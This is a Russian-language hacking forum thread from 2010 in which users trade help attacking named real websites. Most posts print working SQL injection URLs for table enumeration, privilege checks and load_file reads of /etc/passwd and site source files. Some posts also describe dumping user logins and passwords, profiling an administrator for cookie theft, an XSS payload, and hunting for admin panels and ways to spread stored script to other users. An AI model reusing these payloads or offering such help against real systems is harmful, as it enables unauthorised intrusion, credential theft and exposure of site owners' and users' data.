09.03.2010, 01:35
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
Провел на форуме:
750247
Репутация:
92
|
|
Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252
.
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Çàïðîñ_Ñòàäèè_Êëèåíò' to a column of data type int.
Подставляю это значение в запрос
1 or 1=(select top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama','Çàïðîñ_Ñòàäèè_Êëèåíò'))
Получаю тоже самое.
Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста. |
|
|
09.03.2010, 05:04
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от 4p3
Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252
Подставляю это значение в запрос
Получаю тоже самое.
Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста.
1 or 1=(select Val collate Cyrillic_General_CI_AS top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama'))
мб Val ненужен, и мб перед from поставить, сгуглил просто.
http://www.sql.ru/forum/actualthread.aspx?tid=415606
|
|
|
|
09.03.2010, 02:43
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681
Репутация:
0
|
|
Здрасти!
Возникла проблема которую не могу решить даже после прочтения етого треда,множества FAQ по sql inj, sql cheat sheet'ов, мануалов, статей в Хакере и всего подобного.
Вообщем дело обстоит так:
inj:
http://enjoy.md/category.php?id=2%27] http://enjoy.md/category.php?id=2'
Доступ к БД осуществил, вытянуть удалось лишь логины и пассы пользователей сайта, найти логин и пасс админа в этой БД не удалось. В user_privileges - privilege_type-usage и is_grantable-no:
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,grantee,privilege_type ,is_grantable%29+from+information_schema.user_priv ileges--
load_file выдает пустую страницу(что в hex, что в текст, что с aes_decrypt(aes_encrypt)):
http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27etc/passwd%27%29,3--+
http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27home/vhosts/enjoy.md/public_html/index.php%27%29,3--+
инфа:
version() - 5.1.37 mysql
user()- '20121'@'localhost'
database() - 20121_enjoy
ещё нашел адмику:
http://enjoy.md/admin/
и PMA:
http://enjoy.md/phpmyadmin
что интересно, вовсяком случае мне так показалось, так ето вот:
http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,table_schema+from+information_schema.tables+wh ere+table_name=%27admin%27--
Не могу понять откуда эти БД взялись если при таком запросе их не видно:
http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,schema_name+from+information_schema.schemata--
Подключитьсяк ним никак не могу,есть ли способ и гдеж логин и пасс админа хранится тогда? в PMA и админке обойти авторизацию не вышло.
Помогите додумать это плз, может совет какой дадите.
На данный момент приходит в голову лишь кража кукисов, на сайте есть мыло и icq, с их помощью узнал ФИО админа,место работы, сделанные им сайты. Не приятно признавать но не охото мне с кукисами морочиться если есть другие варьянты дайте знать 
SiXSS(alert):
http://enjoy.md/category.php?id=-2/**/union/**/select+1,2,0x3c7363726970743e616c657274282256756c6 e65726162696c69747922293b3c2f7363726970743e%20--
Это может выглядить глупо но всё же:
http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+
значит всё же file_priv=Y? если я чёт намудрил плз исправьте
доступа к file_priv непсредственно из mysql.users нету,даёт ошибку, как впрочем и к самой БД mysql:
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,file_priv+from+mysql.users--
еще вопрос, почему пишет privilege_type-select is_grantable-no? Я же вовсю им орудую. Или это отнсится лишь к БД и их выбору?
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,privilege_type,is_gran table%29+from+information_schema.schema_privileges--
надеюсь я ниче не перепутал спс!
кстати: @@datadir - /var/lib/mysql/
а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php
т.к. в моём случае заливка шелла не возможна по всей видимость просто прошу обьяснить какой именно путь указать при load_file |
|
|
|
09.03.2010, 03:32
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
overcrookd в user есть
login:admin
password:666 может это и есть то самое?
п.с ток всеравно логин иле pwd не подходит
Последний раз редактировалось [Feldmarschall]; 09.03.2010 в 03:39..
|
|
|
|
09.03.2010, 04:08
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681
Репутация:
0
|
|
Сообщение от [Feldmarschall]
overcrookd в user есть
login:admin
password:666 может это и есть то самое?
п.с ток всеравно логин иле pwd не подходит
естессно я первым делом проверил это, увы, это login и pwd для входа на сайт, не админку.
всеоравно спасибо зв потраченое время
|
|
|
|
09.03.2010, 06:09
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
Провел на форуме:
750247
Репутация:
92
|
|
Благодарю, я видел эту тему.
http://www.rosdiplom.ru/readyi2a1a2new.asp?id=1%20or%201=(select%20top%201 %20table_name%20collate%20Cyrillic_General_CI_AS%2 0from%20information_schema.tables%20where%20table_ name%20not%20in%20('rank_table','reklama'))
Все равно это не решает вопроса с кодировкой, ну и ладно. Видать, встроенными функциями этого не сделать. Пробовал уже и множество чаров, но нет.
Скуль - боян, но интересно, как его раскрутили пару лет назад. |
|
|
|
09.03.2010, 10:51
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.linumechilinum.am/?include=static2&page_id=49+union+/*!select*/+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60
не как не мояу узнать числу..
помоqите//
|
|
|
|
09.03.2010, 16:02
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 1
Провел на форуме:
671
Репутация:
0
|
|
Есть сайт http://live-cs.ru/, на нем при установке статуса в профиле(http://live-cs.ru/people/Medic/ например) срабатывает введенный код, как это можно использовать, чтобы какой-нибудь другой юзер выполнил действие кода?
|
|
|
|
09.03.2010, 18:16
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2LokbatanLi
c чего ты взял что там скуля?
page_id=49+order+by+1/*
page_id=49'+order+by+1/*
page_id=49+0
нет результата...
вопрос
site?indwx.php?keyword=1'
Message: Can't execute query: You have an error in your SQL syntax; ... '/*%' OR
SELECT COUNT(u.user_id) FROM user AS ... AND (u.name LIKE '%1\'%')
никак не обойти?
заменять ' на %27 пробовал |
|
|
|
09.03.2010, 20:29
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
Помогите найти админку http://www.f1-world.ru
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1965481){kind=avatar}
Похожие темы
Комбинированный вид
